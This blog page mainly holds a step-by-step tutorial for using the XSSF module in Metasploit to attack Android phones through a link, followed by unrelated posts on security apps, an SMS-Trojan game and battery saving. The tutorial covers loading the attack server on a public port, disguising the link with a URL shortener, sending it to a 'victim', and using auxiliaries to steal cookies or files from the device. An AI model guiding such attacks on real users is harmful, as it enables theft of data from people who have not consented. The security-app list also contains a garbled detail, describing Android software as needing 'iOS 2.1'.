Penetration Testing – Cross Site Scripting on android device using Kali Linux

Penetration Testing – Cross Site Scripting on android device using Kali Linux

Hello Guyzz!! :D

Today we will learn how to pen test Cross Site Scripting on Android device and how a hacker can exploit an android phone using XSSF(Cross site Scripting) from Kali Linux..

What is Cross site Scripting??

Cross site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

Note : This is only for educational purpose!!

Requirements to perform XSSF:-

1.Kali Linux installed on your machine

2.Cross-Site Scripting Framework Tool( u can find it here https://code.google.com/p/xssf/ )

3.Metasploit framework which comes pre installed in Kali..

4.And an android Phone to run exploits..

Okk thn lets get started…

Step 1: Open the terminal and navigate to /usr/share/metasploit-framework  using the below command:

Cd /usr/share/metasploit-framework

Step 2: Now install xssf framework tool using the following command within the metasploit directory..

svn export http://xssf.googlecode.com/svn/trunk/ XSSF

For screenshot of above step:

The xssf tool already exists in my machine…

Step 3: Navigate to Applications>Kali Linux>Sytem Services>Metasploit>click on community / pro start

And also restart Mysql::Applications>Kali Linux>Sytem Services>MySQL>mysql restart

Now open the new terminal and type msfconsole

Step 4: Now load the xssf framework on a specified port..using the following command::

load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose

here,I em using Port 80

Now to list the URLs which has to be sent to the victims use the following command;;

Xssf_urls

Here is the screenshot of all the above:

If u want to exploit a device which is in ur lan u shoud send this url to the victim::

http:// <your lan ip>:80/xssf/test.html

Or,if you want to exploit the device out of lan u should send this url to the victim::

http://:80/xssf/test.html

Here::PUBLIC-IP refers to ur external ip..

Use any online IP address service to know you IP like whatsmyipaddress.

To exploit a device out of lan u need to forward ur port whichever u use like if,I wanted to exploit a device out of lan I must forward my port 80..

To know about how to do port forwarding visit this link:: Port Forwarding

Ok,now v we vl continue with exploiting a device in LAN..

Step 5::

Shorten ur url using online url shortner and then send it to the victim so that he/she just clicks on it..

When the victim clicks on the url he/she is said to be exploited..

Here is the screen shot of the victim:

Step6::

The information of the victim can be known by opening the main log page..

Here::

http://<your lan ip>:80/xssf/gui.html?guipage=main

the attacker should use this page evn though he is exploiting a device out of lan to gather information about the victim..

The sample screen shot of log page is given below:

Step 7::

Now tha the victim is exploited we can use the auxiliary to steal files frm the device or to steel the cookies,to send alert messages,etc…

Here I we will send an alert message to the victim saying that its an XSSF Attack!!

First search for the auxiliary u want to use using the following command::

Search auxiliary/xssf

Here is the screenshots of auxiliaries:

I vl b using the auxiliary highlighted on the screen shot to send the alert message to the victim..

The auxiliary can be used as follows::

Use auxiliary/xssf/public/misc/alert [hit enter]

Now type:: show options [hit enter]

U can set the alert message u want using set AlertMessage command

Here is the screenshot:

To run the auxiliary just type run and hit enter..

The victim will be displayed with alert message on his screen,as shown

The log page will also be updated upon the types of auxiliaries u run on victims device, as shown below:

Note: If you use a auxiliary which can steal files from victim’s  device, the file can be downloaded from the above log page when exploited successfully!!

So try this stuff n enjoy!!

Have a good day!!

Tutorial by: Kartik Durg

Thank u.. ;)

Top 7 Android Security Apps 

If you are an active internet/web user, you must be aware of the potential dangers that lurk online, including harmful malwares, viruses, Trojans, and spyware bots etc. These threats expose your personal data to hackers (unwanted users) and put your privacy at risk. To avoid these risks, it’s necessary to use good security apps that can protect you from all of the above mentioned threats and potential dangers.

These security apps allow users to protect themselves not only from harmful online threats but also from physical ones, like a phone being misplaced or stolen. So ... lists the top Android security apps for android phones.

Top 7 Android Security Apps Ever

1. Lookout Security & Anti-Virus

Lookout Security & Anti-virus app for Android is an application that secures Android users from threats such as bugs, Trojans, and viruses that may enter the device through local networks or online. Lookout Security & Anti-virus allows users to protect their vital data and find their phone if they misplace it, and backup their important files and documents in a safer place.

Use the Lookout Security & Anti-virus app to scan every individual app you download to make sure the apps are safe from malware, spyware and Trojans. A great feature found in the application is the “Routine Check” that allows users to schedule daily or weekly scans of the apps you download. You can also get automatic, over-the-air protection against the latest threats.

2. AVG Antivirus

AVG Antivirus is the Android based application of the renowned antivirus software for personal computers with the same name. AVG Antivirus app allow users to scan apps, setting files and media card in real-time, allowing you to find any threats in any of them that may put your privacy and vital information at risk of being exposed. Not only applications, the AVG Antivirus application for Android also allows users to screen incoming SMS to detect any harmful threats.

The AVG Antivirus also ensures the maximum speed of your phone by giving users a task manager to kill off any apps and tasks that slow the device down.

3. McAfee WaveSecure

McAfee WaveSecure is an award winning mobile protection app for your Android devices and systems. McAfee WaveSecure gives users the option to secure their personal data on their mobile device, in the event that the mobile may be lost or stolen. In such a case, McAfee WaveSecure can be used to track your device and even wipe all data on the Android device, saving it from any prying eyes. An easy-to-use web portal allows users to backup and restore their personal data.

4. Norton Antivirus & Security

Norton Antivirus & Security is a security application for Android devices with iOS 2.1 and up. The Norton Antivirus & Security allows users to protect their devices from loss of data, in case of theft and malware attacks. One of the best antivirus companies in the world, Norton Antivirus backs Norton Antivirus & Security. Norton Antivirus & Security provides all the features that will be required by an Android user to keep themselves save and secure from malware, Trojans, spyware and other incidents such as theft. The antivirus protection automatically scans the downloaded apps and app updates against any potential harmful threats. It also searches for and removes mobile security threats that may tamper with your phone in order to achieve your personal information. Norton Antivirus & Security allows users to scan the SD card for any harmful threats. Norton Antivirus & Security also allows users to lock their devices and remote wipe any confidential data found on the device if their devices are misplaced or stolen.

5. Mobile Security & Antivirus

The Mobile Security & Antivirus provides the users with two basic functions that keep vital information safe and secure from all kinds of threats. These two functions are that of – Antivirus protection and security. The Mobile Security & Antivirus protects your Android device free from viruses and saves your battery life, an essential, helpful feature when you require battery life and have only a little left. Use the Mobile Security & Antivirus’s malware scanner feature to scan apps as you download them to check for any harmful threats that may put your privacy at risk, including your confidential data such as passwords and emails.

One of the best features present in Mobile Security & Antivirus is the “Application Audit” feature that can be used to ensure that apps do not take more permission then they should and thus allow you to safeguard your private data, and even access to unwanted Internet updates or so.

6. Avast! Mobile Security

Avast! Mobile Security provides Android users with OS 2.1 and up with protection from viruses and theft security issues. Use the Avast! Mobile Security to protect private data with automatic virus scans and find infected URLs before they infect your mobile with malware and spyware. Use the SMS commands to wipe, lock and GPS track your Android device in case if it is stolen or misplaced somewhere outside home. You can also use the “Activate Siren” feature to turn on a loud siren allowing you to locate your mobile phone – a helpful feature if the phone is misplaced somewhere inside your home.

Avast! Mobile Security application also allows users to screen incoming SMS and phone calls. Use parameters to direct specific unwanted calls to voicemail.

7. NQ Mobile Security & Antivirus

The NQ Mobile Security & Antivirus is a total mobile security solution for Android devices, protecting them from harmful threats such as malware, spyware and Trojans while also allowing users to monitor their devices to ensure maximum speeds. Use the NQ Mobile Security & Antivirus app to browse the internet safely without having to worry about phishing, fraud sites and malware that lurk on the internet. The app is updated regularly, keeping in track with all the latest viruses and threats discovered.

Use the Network Manager to track your traffic consumption over a period of 30 days and keep up on the trend and statistics as well. Use the Backup & Restore feature present in the NQ Mobile Security & Antivirus app to backup and retrieve contacts and messages found on any of your mobile device – iOS, Android, Blackberry or Nokia.

Let me know if we missed one!

Android Attacked by Malware Hidden in Game

It’s very rare to hear about an instance when Android malware is detected, but recently a Chinese hacker tried to hack Android using a game named “The Roar of the Pharaoh.” The bug was spotted by the security team (penetration testing) from Sophos, a well known security firm. The game does not show any security or permission issues when the user installs it, so Android users believe that it is a reliable and non-malicious software and will not harm their system. Pease avoid android games and applications from unknown publishers, as they may result in a critical information leak and sometimes in an OS crash.

New Android Malware Detected by Sophos

The game actuallys collects all the sensitive and personal information from the device (like a normal Trojan) and sends it to the author via an SMS with premium rates, without getting the user’s permission. The Trojan sends information like phonebook entries, SMS, IMEI number, phone number, OS version etc. Though no cases of illegal usage of the users’ information have been reported yet, researchers believe that more damage can be done using this bug.

According to the vendor, the malware runs as a service called “GameUpdaterService,” which sounds like a legitimate name for an application, making the user think that a game is updating, but this is just another example of the social engineering element of a campaign which makes it look like a reliable application, next to the actual brand-jacking of a legitimate game’s name.

The application has been detected as an Stinter-A, the mobile phone companies process the money to the authors before the application user gets the bill. Michael Sutton, Vice President of security research at cloud-based security provider Zscaler, said the fake “The Roar of the Pharaoh” app for Android reflects a shift of malware authors targeting the Android platform, whether through smartphones or tablets. Fake game apps that are really Trojans are increasing and “this is a typical scam for Android now,” he added.

The interests of the hackers has now shifted from computers to Android phones. Android officials have not released a statement about this application, but have warned its users to beware of such malicious applications.

The authors have not yet been caught, and the Chinese Security is still working to put them behind bars.

How to maximize or boost android battery life

Android phones are powerful, useful, cool and very interesting devices which makes you addicted to the phone. Most of the android smartphone users have one big issue: “battery backup”. You don’t need to change the device because it drains out quickly instead we will you tips about how to improve the battery life of your android smartphone?

Maximize or boost android phone battery life

Instructions:

1.  Use android’s built in battery usage screen: Check whats exactly eating up your android phone’s battery the most. Go to Settings > About Phone > Battery Use. From this screen you can understand what to turn off in your phone settings to save battery.

2. Adjust the brightness: Big bright screens are great to look at but they eat up the maximum amount of your android’s battery. To adjust the brightness go to Settings > Display > Brightness. Either you can select the auto brightness option if available or adjust it manually.

3. Disable Wi-Fi: We know browsing on wifi is much faster than browsing on mobile data plan. Make sure you turn off the wifi when you aren’t using it because if the wifi is on your phone will keep on scanning for available networks. Go to Settings > Wireless and network settings> Wifi settings > Turn Off Wifi. (or simply turn off the wifi from the notification area)

4. Disable Bluetooth: Disable Bluetooth whenever you are not using it. It saves a lot of battery as well as keeps your smartphone save too. Go to Settings > Wireless and network settings>Bluetooth settings> Turn of Bluetooth. (or simply turn off the Bluetooth from the notification area)

5. Disable GPS: Disable GPS and Latitude when you are not using it. GPS is a very powerful service but it drains the battery pretty fast. Use GPS only when you need it. Go to Settings> Location and Security Settings> Remove check from “Use GPS Satellites”. (or simply turn off the GPS from the notification area)

Note: You can use the “Power Widget” to easily toggle GPS, Bluetooth, Wifi and Screen Brightness.
 

6. Disable automatic sync: Many applications like Gmail, facebook, twitter and other email apps eat up a lot of battery due to automatic sync features. Background data is also required to get the e-mails and updates at regular intervals. The best settings you can make is to keep the background data on and automatic sync feature turned off. Go to Settings> Accounts and Sync> Remove check mark from “Auto-sync”.

7. Disable or remove the apps that you don’t use:  There are many apps which we have installed and we never use them. Make sure you remove such apps because many of those apps keep running at the background. This will help you in freeing up internal phone memory as well as save battery.

8. Disable home screen widgets and live wallpaper:  Home screen widgets always make the apps running at the background. So make sure you keep only those widgets that you generally use. Live wallpaper is sure an eye candy and makes your smartphone home screen look beautiful, but it makes the battery backup half of what you would normally get if you use an image as wallpaper. So don’t use live wallpaper and use minimum widgets.
 

9. Use a good task killer: I would suggest you to use the inbuilt Task Killer app of your android smartphone because it has been designed according to your phone. If you want you can also grab a good task killer from android market and make sure you use it according to the instructions given. If used properly task killers can do wonders for your smartphone.

10. Use battery saving apps: There are many applications that aim to improve your battery performance. The majority of these restrict internet use and can be customized according to your needs. One of the best app for this purpose is “Juice Defender” available in both paid and free versions in android market.  “Juice Defender” lets you configure a bunch of parameters to govern your phone’s power usage. You could set android to automatically switch off data services during the night, for example, or to only enable synchronization when your screen is actually on.

Different versions of android have different levels of battery performance. Generally with each new version of Android battery life has improved. The latest version of Android, Gingerbread 2.3 has good a good battery backup in comparison with the older versions.
Sources:Enzag